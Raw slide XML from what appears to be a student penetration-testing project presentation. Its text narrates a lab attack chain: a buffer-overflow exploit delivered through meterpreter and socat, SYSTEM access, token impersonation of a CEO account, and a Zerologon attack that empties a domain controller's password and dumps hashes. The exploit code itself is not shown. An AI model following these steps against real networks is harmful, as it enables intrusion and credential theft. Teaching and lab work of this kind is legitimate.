                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;gae927e1771_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="5857875"/>
            <a:ext cx="36576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F0000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Indicate past, current and future task</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ba014e31c3_0_198"/>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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017" name="Google Shape;1017;gba014e31c3_0_198"/>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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t>In the other meterpreter session, upload the exploitmeterpreter.py file to the Web server.</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t>Type command dir to check that the exploitmeterpreter.py file has been uploaded.</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1018" name="Google Shape;1018;gba014e31c3_0_198"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="513075" y="3026932"/>
            <a:ext cx="7781399" cy="2817843"/>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gba014e31c3_0_206"/>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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;gba014e31c3_0_206"/>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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Open another meterpreter session to listen for incoming connections from the socat port forwarding.</a:t>
            </a:r>
            <a:endParaRPr sz="2900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Google Shape;1026;gba014e31c3_0_206"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571263" y="2847125"/>
            <a:ext cx="7665025" cy="29412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gba014e31c3_0_214"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681310" y="654931"/>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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="Google Shape;1033;gba014e31c3_0_214"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665165" y="1549350"/>
            <a:ext cx="7477200" cy="3759300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500"/>
              <a:t>Run the exploitmeterpreter.py code and I will get a meterpreter session of the windows 7 file server.</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1034" name="Google Shape;1034;gba014e31c3_0_214"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="893088" y="2319263"/>
            <a:ext cx="6881125" cy="1714562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1035" name="Google Shape;1035;gba014e31c3_0_214"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665588" y="4563125"/>
            <a:ext cx="8153274" cy="15439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gba014e31c3_0_228"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681310" y="68300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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1042" name="Google Shape;1042;gba014e31c3_0_228"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1043" name="Google Shape;1043;gba014e31c3_0_228"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823150" y="1651000"/>
            <a:ext cx="4623848" cy="5097875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044" name="Google Shape;1044;gba014e31c3_0_228"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817500" y="2230050"/>
            <a:ext cx="2882700" cy="16656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Type getuid, you can see that I have NT AUTHORITY\SYSTEM privileges.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>However, I still can’t access the SecretForumla folder because it is only accessible with the CEO account.</a:t>
            </a:r>
            <a:endParaRPr sz="1700">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gba014e31c3_0_222"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681310" y="69700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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1051" name="Google Shape;1051;gba014e31c3_0_222"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1052" name="Google Shape;1052;gba014e31c3_0_222"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3334000" y="1769150"/>
            <a:ext cx="4950126" cy="4958350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053" name="Google Shape;1053;gba014e31c3_0_222"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="2363725"/>
            <a:ext cx="24123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latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Perform token impersonation to impersonate as CEO user</a:t>
            </a:r>
            <a:endParaRPr sz="1900">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gba014e31c3_0_243"/>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Buffer overflow (attack from public network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1060" name="Google Shape;1060;gba014e31c3_0_243"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1025800"/>
            <a:ext cx="4179751" cy="5832200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1061" name="Google Shape;1061;gba014e31c3_0_243"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="1823800"/>
            <a:ext cx="3211500" cy="15660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After performing token impersonation, to impersonate as CEO, I am able to access the SecretForumla folder.</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>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gafe6dd4b99_0_0"/>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AD Exploit Zerologon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;gafe6dd4b99_0_0"/>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First, the insider finds the IP address of the domain controller and its netBIOS name.</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>Next, we conduct recon to see if the AD DC is vulnerable to Zerologon exploit.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1069" name="Google Shape;1069;gafe6dd4b99_0_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2510750"/>
            <a:ext cx="4371975" cy="1133475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1070" name="Google Shape;1070;gafe6dd4b99_0_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4657122"/>
            <a:ext cx="9144001" cy="190640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gba014e31c3_1_0"/>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Story 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Google Shape;1077;gba014e31c3_1_0"/>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gb9e1a338e6_0_1"/>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AD Exploit Zerologon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;gb9e1a338e6_0_1"/>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We start the exploit by establishing a Netlogon channel against the DC and setting its local account’s password to empty.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1085" name="Google Shape;1085;gb9e1a338e6_0_1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2740275" y="2698299"/>
            <a:ext cx="5706726" cy="20944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gb9e1a338e6_0_9"/>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AD Exploit Zerologon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1092" name="Google Shape;1092;gb9e1a338e6_0_9"/>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Next, we connect to the DC and it asks for the password, where we can just pass an empty value since the password is not empty and dump the hashes of the domain users</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1093" name="Google Shape;1093;gb9e1a338e6_0_9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2677075" y="2960875"/>
            <a:ext cx="6272176" cy="3602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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7781925" cy="60483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sz="2880">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Records of Team Meetings with Supervisor</a:t>
            </a:r>
            <a:endParaRPr sz="2880">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="259" name="Google Shape;259;p8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="86138" y="1577725"/>
          <a:ext cx="8940000" cy="1849425"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{5830FC0F-5C3E-4966-B63A-2CCE79721B59}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Name</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>21/10/2020</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>28/10/2020</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>4/11/2020</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>11/11/2020</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>18/11/2020</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>25/11/2020</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>2/12/2020</a:t>
